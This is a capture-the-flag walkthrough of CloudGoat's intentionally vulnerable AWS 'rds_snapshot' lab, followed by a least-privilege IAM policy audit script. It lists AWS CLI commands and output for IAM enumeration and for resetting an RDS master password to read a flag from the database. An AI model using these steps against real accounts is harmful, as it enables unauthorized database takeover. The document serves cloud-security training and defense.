Challenge URL
cloudgoat/cloudgoat/scenarios/aws/rds_snapshot/README.md at master · RhinoSecurityLabs/cloudgoat
CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool - RhinoSecurityLabs/cloudgoat
Challenge description
1. Starting with access to EC2, the user can leverage the privileges of the EC2 instance to steal credentials from S3.
2. With the stolen credentials, the attacker can gain RDS Snapshot restore privileges, which will allow them to access the DB and retrieve flags.
Walkthrough
1. Analyze current permissions
# ---------- 1. Analyze current permissions ----------
### Create a profile ###
aws configure --profile s3_secret
### List users ###
aws iam list-users \
--profile s3_secret
{
"Users": [
{
"Path": "/",
"UserName": "cg-rds-instance-user-cgidlienje4waf",
"UserId": "AIDA2YICACBLYARASU3BI",
"Arn": "arn:aws:iam::739275444311:user/cg-rds-instance-user-cgidlienje4waf",
"CreateDate": "2025-05-02T03:20:25Z"
}
]
}
### List policies ###
aws iam list-policies \
--profile s3_secret | grep cgidlienje4waf
### Inline policies attached to <user> ###
aws iam list-user-policies \
--user-name cg-rds-instance-user-cgidlienje4waf \
--profile s3_secret
{
"PolicyNames": [
"cg-david-policy"
]
}
### Inline policy attached to <user> (policy document) ###
aws iam get-user-policy \
--policy-name cg-david-policy \
--user-name cg-rds-instance-user-cgidlienje4waf \
--profile s3_secret
{
"UserName": "cg-rds-instance-user-cgidlienje4waf",
"PolicyName": "cg-david-policy",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"rds:DescribeDBInstances",
"rds:AddTagsToResource",
"rds:DescribeDBSnapshots",
"rds:RestoreDBInstanceFromDBSnapshot",
"rds:ModifyDBInstance",
"iam:Get*",
"iam:List*"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
}
### List roles ###
aws iam list-roles \
--profile s3_secret
{
"Path": "/",
"RoleName": "cg-ec2-admin-role",
"RoleId": "AROA2YICACBLQ2G44QKBG",
"Arn": "arn:aws:iam::739275444311:role/cg-ec2-admin-role",
"CreateDate": "2025-05-02T03:20:25Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
### Get role details ###
aws iam get-role \
--role-name cg-ec2-admin-role \
--profile s3_secret
{
"Role": {
"Path": "/",
"RoleName": "cg-ec2-admin-role",
"RoleId": "AROA2YICACBLQ2G44QKBG",
"Arn": "arn:aws:iam::739275444311:role/cg-ec2-admin-role",
"CreateDate": "2025-05-02T03:20:25Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600,
"Tags": [
{
"Key": "Scenario",
"Value": "rds_snapshot"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"RoleLastUsed": {
"LastUsedDate": "2025-05-02T04:05:51Z",
"Region": "us-east-1"
}
}
}
### List DB instances ###
aws rds describe-db-instances --profile s3_secret
{
"DBInstances": [
{
"DBInstanceIdentifier": "cg-rds",
"DBInstanceClass": "db.t3.micro",
"Engine": "mysql",
"DBInstanceStatus": "available",
"MasterUsername": "cgadmin",
"Endpoint": {
"Address": "cg-rds.ca5yusseq5gc.us-east-1.rds.amazonaws.com",
"Port": 3306,
"HostedZoneId": "Z2R2ITUGPM61AM"
},
"AllocatedStorage": 20,
"InstanceCreateTime": "2025-05-02T03:24:11.656Z",
"PreferredBackupWindow": "06:14-06:44",
"BackupRetentionPeriod": 0,
"DBSecurityGroups": [],
"VpcSecurityGroups": [
{
"VpcSecurityGroupId": "sg-0c427606feb354b7b",
"Status": "active"
}
],
"DBParameterGroups": [
{
"DBParameterGroupName": "default.mysql5.7",
"ParameterApplyStatus": "in-sync"
}
],
# (middle of output omitted) #
"CustomerOwnedIpEnabled": false,
"ActivityStreamStatus": "stopped",
"BackupTarget": "region",
"NetworkType": "IPV4",
"StorageThroughput": 0,
"CertificateDetails": {
"CAIdentifier": "rds-ca-rsa2048-g1"
},
"DedicatedLogVolume": false,
"IsStorageConfigUpgradeAvailable": false,
"EngineLifecycleSupport": "open-source-rds-extended-support"
}
]
}
2. Reset the DB password and extract the DB contents
# ---------- 2. Reset the DB password and extract the DB contents ----------
### Modify the DB instance (master-user-password) ###
aws rds modify-db-instance --db-instance-identifier cg-rds --master-user-password <desired_password> --profile s3_secret
### Connect to the DB instance ###
mysql -h cg-rds.ca5yusseq5gc.us-east-1.rds.amazonaws.com -P 3306 -u cgadmin -p
### DB commands ###
1) show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| innodb |
| mydatabase |
| mysql |
| performance_schema |
| sys |
+--------------------+
6 rows in set (0.00 sec)
2) use mydatabase;
3) show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| flag |
+----------------------+
1 row in set (0.00 sec)
4) select * from flag;
Security improvements
1. Operate IAM permissions at the minimum required (least privilege)
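As an added example (not part of the original write-up or of CloudGoat), the following script audits an IAM policy document for the grants this scenario depends on: sensitive RDS actions on a wildcard resource and broad iam:Get*/iam:List* enumeration. It is run against the cg-david-policy document shown above and against a constructed least-privilege replacement; the two snapshot-sharing actions in the sensitive list and the ACCOUNT_ID placeholder are assumptions, not values from the page.

```python
"""Audit an IAM policy document for the over-broad RDS grants exploited in rds_snapshot."""
import fnmatch

# RDS actions that hand a principal the database contents. The first two are the ones
# cg-david-policy on this page grants; the snapshot-sharing ones are an added assumption.
SENSITIVE_RDS_ACTIONS = (
    "rds:ModifyDBInstance",                # reset the master password and log straight in
    "rds:RestoreDBInstanceFromDBSnapshot", # bring up a copy of the DB from a snapshot
    "rds:ModifyDBSnapshotAttribute",       # share a snapshot with another account
    "rds:CopyDBSnapshot",
)
IAM_ENUM_PATTERNS = ("*", "iam:*", "iam:Get*", "iam:List*")

def _as_list(value):
    """Statement, Action and Resource may each be a single string or a list."""
    return value if isinstance(value, list) else [value]

def audit_policy(doc):
    """Return (action, resource, reason) findings for every Allow statement in the document."""
    findings = []
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue  # Deny and NotAction statements are outside this check's scope
        resources = _as_list(stmt.get("Resource", []))
        for pattern in _as_list(stmt["Action"]):
            for action in SENSITIVE_RDS_ACTIONS:
                # IAM action patterns are case-insensitive globs, e.g. "rds:*" or "rds:Modify*"
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    for res in resources:
                        if res == "*" or res.endswith(":*"):
                            findings.append((action, res, "sensitive RDS action on wildcard resource"))
            if pattern in IAM_ENUM_PATTERNS:
                findings.append((pattern, ",".join(resources), "broad IAM enumeration"))
    return findings

# The inline policy exactly as `aws iam get-user-policy` returned it on this page.
CG_DAVID_POLICY = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Resource": "*",
    "Action": ["rds:DescribeDBInstances", "rds:AddTagsToResource", "rds:DescribeDBSnapshots",
               "rds:RestoreDBInstanceFromDBSnapshot", "rds:ModifyDBInstance",
               "iam:Get*", "iam:List*"]}]}

# Constructed least-privilege replacement: read-only, scoped to one instance (ACCOUNT_ID is a placeholder).
LEAST_PRIVILEGE_POLICY = {"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
    "Action": ["rds:DescribeDBInstances", "rds:DescribeDBSnapshots"],
    "Resource": "arn:aws:rds:us-east-1:ACCOUNT_ID:db:cg-rds"}]}

if __name__ == "__main__":
    for finding in audit_policy(CG_DAVID_POLICY):
        print(" | ".join(finding))
```

The page's policy yields four findings (the two RDS takeover actions on `*` plus the two IAM wildcards), while the scoped read-only policy yields none; the glob matching also catches `rds:*`, which an exact-string check would miss.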